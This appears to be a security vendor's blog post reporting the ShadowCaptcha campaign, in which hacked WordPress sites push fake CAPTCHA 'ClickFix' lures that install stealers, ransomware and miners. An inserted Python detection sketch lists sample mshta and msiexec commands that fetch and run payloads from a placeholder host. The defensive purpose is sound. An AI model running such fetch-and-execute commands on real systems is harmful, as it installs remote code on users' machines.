ShadowCaptcha Campaign Targets WordPress Sites with Malware

Updated: Aug 27

WordPress Sites Under Siege: ShadowCaptcha Campaign Unleashes Malware

A sophisticated cybercrime operation, dubbed ShadowCaptcha, is actively exploiting over 100 compromised WordPress websites to distribute a range of malicious payloads, including ransomware, information stealers, and cryptocurrency miners. The campaign, detected in August 2025, leverages social engineering tactics and living-off-the-land binaries to compromise targeted systems.

Key Takeaways

  • ShadowCaptcha redirects users to fake CAPTCHA pages to deliver malware.

  • The campaign utilizes social engineering, LOLBins, and multi-stage payloads.

  • Malware includes information stealers (Lumma, Rhadamanthys), ransomware (Epsilon Red), and crypto miners (XMRig).

  • Compromised sites are primarily located in Australia, Brazil, Italy, Canada, Colombia, and Israel.

  • Attackers likely exploit vulnerable WordPress plugins or use compromised credentials.

The ShadowCaptcha Attack Chain

The campaign begins when unsuspecting visitors land on a WordPress site injected with malicious JavaScript. This script initiates a redirection chain leading to fake Cloudflare or Google CAPTCHA pages. From there, the attack splits into two paths depending on the "ClickFix" instructions shown: one has the victim paste a command into the Windows Run dialog, the other prompts the victim to save and execute an HTML Application (HTA) file.

The Windows Run dialog execution path deploys Lumma and Rhadamanthys information stealers via MSI installers or remotely hosted HTA files. Executing a saved HTA payload results in the installation of Epsilon Red ransomware. The ClickFix lure, which copies malicious commands to the user's clipboard for unwitting execution, was previously documented by CloudSEK.
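As an added illustration (not code from the original article or from The Hacker News report), the following Python sketch shows how a defender could flag the two ClickFix execution paths described above in process-creation telemetry. It assumes a simplified event record with parent image, image and command line; the hostnames and file paths in the sample events are constructed placeholders.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

@dataclass
class ProcEvent:
    """Minimal process-creation record (assumed shape, not a real log format)."""
    parent_image: str
    image: str
    command_line: str

REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
HTA_FILE = re.compile(r"\.hta\b", re.IGNORECASE)

def _base(path: str) -> str:
    # Normalise "C:\Windows\explorer.exe" to "explorer.exe" for comparison
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev: ProcEvent) -> Optional[str]:
    """Label launches matching the two ClickFix paths, or return None.
    Commands entered in the Run dialog and files double-clicked in the
    shell are both spawned by explorer.exe, so that parent is the pivot."""
    parent, image = _base(ev.parent_image), _base(ev.image)
    if parent != "explorer.exe":
        return None
    if image in ("mshta.exe", "msiexec.exe") and REMOTE_URL.search(ev.command_line):
        return "clickfix-run-dialog-remote-payload"  # MSI / remotely hosted HTA
    if image == "mshta.exe" and HTA_FILE.search(ev.command_line):
        return "clickfix-saved-hta"  # saved-and-executed HTA path
    return None

def scan(events: List[ProcEvent]) -> List[str]:
    """Return the labels of all suspicious events, in order."""
    hits = []
    for ev in events:
        label = classify(ev)
        if label:
            hits.append(label)
    return hits

# Constructed sample events; "placeholder.invalid" and the paths are made up.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              "mshta https://placeholder.invalid/verify.hta"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\msiexec.exe",
              "msiexec /i https://placeholder.invalid/update.msi /quiet"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              r"mshta C:\Users\user\Downloads\captcha.hta"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
              "notepad notes.txt"),  # benign: no remote URL, no HTA
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(f"{classify(ev) or 'ok':40} {ev.command_line}")
```

The same matching would be expressed as a Sysmon Event ID 1 or EDR query in production; the point is that explorer.exe directly spawning mshta.exe or msiexec.exe with a URL or .hta argument is rare in normal use and worth alerting on.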

Advanced Evasion and Payload Delivery

ShadowCaptcha employs anti-debugger techniques to thwart analysis and uses DLL side-loading to disguise malicious code execution as legitimate processes. Some campaigns have been observed delivering XMRig-based cryptocurrency miners, with configurations fetched from Pastebin for dynamic adjustments. In these instances, attackers have also deployed a vulnerable driver, "WinRing0x64.sys," to gain kernel-level access and enhance mining efficiency.

Geographic Reach and Compromise Methods

The majority of compromised WordPress sites are situated in Australia, Brazil, Italy, Canada, Colombia, and Israel, affecting sectors such as technology, hospitality, legal/finance, healthcare, and real estate. While the exact method of WordPress site compromise remains unclear, researchers suggest attackers gain access through exploits in various plugins or by using compromised WordPress portal credentials.

Mitigation and Broader Threat Landscape

To counter ShadowCaptcha, users are advised to be vigilant against ClickFix campaigns, implement network segmentation to prevent lateral movement, and ensure WordPress sites are regularly updated and secured with multi-factor authentication. The operation highlights the evolution of social engineering into comprehensive cyber operations, enabling stealthy persistence and pivoting between data theft, crypto mining, and ransomware.

This disclosure coincides with GoDaddy's analysis of Help TDS, a traffic distribution system active since 2017, linked to schemes like VexTrio Viper. Help TDS provides malicious PHP code templates injected into WordPress sites, directing users to malicious destinations. Its operators have also developed a malicious WordPress plugin, "woocommerce_inputs," estimated to be installed on over 10,000 sites, which masquerades as a legitimate WooCommerce plugin to evade detection and facilitate traffic monetization and credential harvesting.

As cyber threats become increasingly sophisticated, your security strategy must evolve to keep pace. BetterWorld Technology offers adaptive cybersecurity solutions that grow with the threat landscape, helping your business stay secure while continuing to innovate. Reach out today to schedule your personalized consultation.


Sources

  • ShadowCaptcha Exploits WordPress Sites to Spread Ransomware, Info Stealers, and Crypto Miners, The Hacker News.
